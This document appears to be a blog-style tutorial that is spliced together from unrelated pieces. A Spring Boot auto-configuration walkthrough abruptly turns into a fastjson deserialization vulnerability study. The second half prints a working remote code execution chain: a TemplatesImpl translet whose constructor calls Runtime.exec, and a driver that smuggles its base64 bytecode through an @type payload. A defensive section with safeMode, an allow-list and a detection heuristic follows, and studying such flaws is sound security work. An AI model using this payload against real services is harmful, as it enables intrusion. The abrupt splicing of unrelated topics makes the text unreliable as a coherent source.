Exploring HelloWorld

1. The POM file

Parent project:

```xml
<parent>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-parent</artifactId>
    <version>2.3.2.RELEASE</version>
    <relativePath/> <!-- lookup parent from repository -->
</parent>
```

spring-boot-dependencies is where the versions of the jar packages are defined.

2. Importing dependencies

```xml
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
</dependency>
```

spring-boot-starter: a scenario starter. The web starter imports the dependency components the web module needs in order to run. Spring Boot extracts every functional scenario into its own starter; bring the starter into the project and every dependency of that scenario is imported. Import the starter of whichever scenario you need.

3. The main program class (main entry class)

```java
@SpringBootApplication
public class DemoApplication {
    public static void main(String[] args) {
        SpringApplication.run(DemoApplication.class, args);
    }
}
```

@SpringBootApplication: the Spring Boot application annotation. Placing it on a class marks that class as the Spring Boot main configuration class; Spring Boot runs this class's main method to start the Spring Boot application.

```java
// meta-annotations on @SpringBootApplication
@Target({ElementType.TYPE})
@Retention(RetentionPolicy.RUNTIME)
@Documented
@Inherited
@SpringBootConfiguration
@EnableAutoConfiguration
@ComponentScan(excludeFilters = {
        @Filter(type = FilterType.CUSTOM, classes = {TypeExcludeFilter.class}),
        @Filter(type = FilterType.CUSTOM, classes = {AutoConfigurationExcludeFilter.class})})
public @interface SpringBootApplication {
```

@SpringBootConfiguration: Spring Boot's configuration-class annotation; placed on a class, it marks that class as a Spring Boot configuration class.
    @Configuration: the annotation placed on configuration classes. A configuration class plays the role of a configuration file, and is itself a component in the container (@Component).

@EnableAutoConfiguration: enables auto-configuration. Things we used to have to configure by hand are now configured for us by Spring Boot; @EnableAutoConfiguration tells Spring Boot to switch auto-configuration on, which is what makes it take effect.

```java
@AutoConfigurationPackage
@Import(EnableAutoConfigurationImportSelector.class)
public @interface EnableAutoConfiguration {
```

(In Spring Boot 2.x the imported selector is AutoConfigurationImportSelector; EnableAutoConfigurationImportSelector is the 1.x name.)

@AutoConfigurationPackage: auto-configuration package.
    @Import(AutoConfigurationPackages.Registrar.class): Spring's low-level @Import annotation imports a component into the container; here the imported component is AutoConfigurationPackages.Registrar. ==It scans the package containing the main configuration class (the class annotated @SpringBootApplication) and all of its sub-packages, and registers every component it finds in the Spring container.==

@Import(EnableAutoConfigurationImportSelector.class): imports components into the container. EnableAutoConfigurationImportSelector is the selector that decides which components to import; it returns the fully-qualified class names of everything that needs importing, and those components are added to the container. It brings a large number of auto-configuration classes (xxxAutoConfiguration) into the container, that is, all the components the scenario needs, already configured. With these auto-configuration classes we are spared writing the configuration and injecting the functional components by hand. The candidate class names come from:

```java
SpringFactoriesLoader.loadFactoryNames(EnableAutoConfiguration.class, classLoader);
```
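To make the mechanism above observable, here is an added example (my own code, not from the original post) that performs the same SpringFactoriesLoader lookup the import selector uses and then compares that candidate list with the auto-configuration classes that actually became bean definitions in the running context. It assumes a Spring Boot 2.3.x project with spring-boot-starter-web on the classpath; the class name AutoConfigInspector is arbitrary.

```java
import java.util.ArrayList;
import java.util.List;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.ConfigurableApplicationContext;
import org.springframework.core.io.support.SpringFactoriesLoader;

@SpringBootApplication
public class AutoConfigInspector {

    // Candidates: every class listed under the EnableAutoConfiguration key in the
    // META-INF/spring.factories files on the classpath. This is the same call the
    // import selector makes; nothing is instantiated here.
    public static List<String> candidateAutoConfigurations(ClassLoader classLoader) {
        return SpringFactoriesLoader.loadFactoryNames(EnableAutoConfiguration.class, classLoader);
    }

    // Applied: the subset whose @Conditional checks passed and which therefore
    // became bean definitions. Imported configuration classes are registered under
    // their fully-qualified class name, so bean names can be matched against the
    // candidate list directly.
    public static List<String> appliedAutoConfigurations(ConfigurableApplicationContext ctx) {
        List<String> candidates = candidateAutoConfigurations(ctx.getClassLoader());
        List<String> applied = new ArrayList<>();
        for (String beanName : ctx.getBeanDefinitionNames()) {
            if (candidates.contains(beanName)) {
                applied.add(beanName);
            }
        }
        return applied;
    }

    public static void main(String[] args) {
        ConfigurableApplicationContext ctx = SpringApplication.run(AutoConfigInspector.class, args);
        List<String> candidates = candidateAutoConfigurations(ctx.getClassLoader());
        List<String> applied = appliedAutoConfigurations(ctx);
        System.out.println(candidates.size() + " auto-configuration candidates on the classpath, "
                + applied.size() + " applied in this context:");
        for (String name : applied) {
            System.out.println("  " + name);
        }
        ctx.close();
    }
}
```

The gap between the two lists is the point: the starter puts many candidates on the classpath, but only those whose conditions hold are wired into the container. Running the application with the `--debug` flag prints Spring Boot's conditions evaluation report, which explains per class why a candidate matched or not; reviewing that report is a quick way to see exactly which components a starter has enabled before exposing the service.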

I had only ever understood this vulnerability roughly; recently I found some time to study it in depth.

Java environment:

```
java version "1.8.0_211"
Java(TM) SE Runtime Environment (build 1.8.0_211-b12)
Java HotSpot(TM) 64-Bit Server VM (build 25.211-b12, mixed mode)
```

Create a User class:

```java
public class User {
    private int age;
    public String username;
    private String secret;

    public int getAge() {
        return age;
    }

    public void setAge(int age) {
        this.age = age;
    }

    public String getUsername() {
        return username;
    }

    public void setUsername(String username) {
        this.username = username;
    }

    public String getSecret() {
        return secret;
    }

    @Override
    public String toString() {
        return this.age + "," + this.username + "," + this.secret;
    }
}
```

| Function | Effect |
| --- | --- |
| JSON.toJSONString(Object) | Serializes the object to JSON |
| JSON.toJSONString(Object, SerializerFeature.WriteClassName) | Serializes the object to JSON and records the class the object belongs to |
| JSON.parse(Json) | Turns the JSON back into an object (fails when deserializing a class object that has no @type) |
| JSON.parseObject(Json) | The returned object is of class com.alibaba.fastjson.JSONObject |
| JSON.parseObject(Json, Object.class) | The returned object is decided by the @type in the JSON |
| JSON.parseObject(Json, User.class, Feature.SupportNonPublicField) | Also restores the private members of the class that the JSON maps to |

Use the POC that circulates on the internet directly:

```java
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class poc extends AbstractTranslet {
    public poc() throws IOException {
        Runtime.getRuntime().exec("calc.exe");
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public static void main(String[] args) throws Exception {
        poc t = new poc();
    }
}
```

Compile this file, base64-encode its contents, and have fastjson restore the object:

```java
import java.io.*;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import org.apache.commons.io.IOUtils;
import org.apache.commons.codec.binary.Base64;

public class Vultest {
    public static String readClass(String cls) {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try {
            IOUtils.copy(new FileInputStream(new File(cls)), bos);
        } catch (IOException e) {
            e.printStackTrace();
        }
        return Base64.encodeBase64String(bos.toByteArray());
    }

    public static void main(String[] args) throws UnsupportedEncodingException {
        ParserConfig config = new ParserConfig();
        String evilCode = readClass("D://code//fastjsonvul//target//classes//Poc.class");
        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        String text1 = "{\"@type\":\"" + NASTY_CLASS + "\",\"_bytecodes\":[\"" + evilCode + "\"],'_name':'a.b','_tfactory':{},\"_outputProperties\":{},"
                + "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n";
        Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField);
    }
}
```

Set a breakpoint on exec and inspect the call stack.
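For contrast, here is an added example (my own code, not from the original post) showing the same parse call in the shape a defender wants it: bound to a concrete target class, without Feature.SupportNonPublicField, and with autoType disabled at the ParserConfig level so an @type key is rejected instead of instantiating whatever class it names. It assumes fastjson 1.2.68 or later for setSafeMode (setAutoTypeSupport and addAccept exist since 1.2.25); the nested User is a trimmed copy of the post's class, the sample documents are constructed, and the package prefix com.example.model. is a placeholder.

```java
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.ParserConfig;

public class SafeParse {

    // Trimmed copy of the post's User class so this file compiles on its own.
    public static class User {
        private int age;
        public String username;
        private String secret;
        public int getAge() { return age; }
        public void setAge(int age) { this.age = age; }
        public String getUsername() { return username; }
        public void setUsername(String username) { this.username = username; }
        public String getSecret() { return secret; }
    }

    // Constructed sample inputs, not captured traffic.
    static final String BENIGN = "{\"age\":30,\"username\":\"alice\",\"secret\":\"x\"}";
    static final String TYPED  = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_name\":\"a\"}";

    // Option 1 (fastjson >= 1.2.68): safeMode switches autoType off completely, so
    // any @type key makes the parser throw rather than resolve the named class.
    static ParserConfig safeModeConfig() {
        ParserConfig config = new ParserConfig();
        config.setSafeMode(true);
        return config;
    }

    // Option 2 (fastjson >= 1.2.25): autoType off by default plus an allow-list of
    // package prefixes that @type may still name. "com.example.model." is a placeholder.
    static ParserConfig allowListConfig() {
        ParserConfig config = new ParserConfig();
        config.setAutoTypeSupport(false);
        config.addAccept("com.example.model.");
        return config;
    }

    // Bind to the concrete target type with default features only. Without
    // Feature.SupportNonPublicField the private field User.secret (no setter) is
    // not populated from input, matching the table in the post.
    static User parseUser(String json, ParserConfig config) {
        return JSON.parseObject(json, User.class, config);
    }

    // true when the parser rejected the document, false when it deserialized it.
    static boolean isRejected(String json, ParserConfig config) {
        try {
            parseUser(json, config);
            return false;
        } catch (JSONException e) {
            return true;
        }
    }

    // Heuristic for a log-inspection or WAF layer: flag bodies that name a class or
    // carry a bytecode field. JSON string escapes allow the same key to be written in
    // other forms, so treat this as a detection signal, not as the mitigation itself.
    static boolean looksLikeAutoType(String body) {
        return body.contains("@type") || body.contains("_bytecodes");
    }

    public static void main(String[] args) {
        ParserConfig config = safeModeConfig();
        User u = parseUser(BENIGN, config);
        System.out.println("benign -> username=" + u.getUsername() + ", secret=" + u.getSecret());
        System.out.println("typed  -> rejected=" + isRejected(TYPED, config));
        System.out.println("typed  -> flagged=" + looksLikeAutoType(TYPED));
        System.out.println("typed  -> rejected with allow-list=" + isRejected(TYPED, allowListConfig()));
    }
}
```

The parser-level settings are the control that matters: they stop the @type lookup before TemplatesImpl (or any other class) is ever resolved, independent of what the request body looks like. The substring check only helps with visibility, for example to count how often a service receives typed payloads in its access logs. The same settings can be applied globally with ParserConfig.getGlobalInstance() or the fastjson.parser.safeMode system property, which is easier to audit than per-call configs scattered through a codebase.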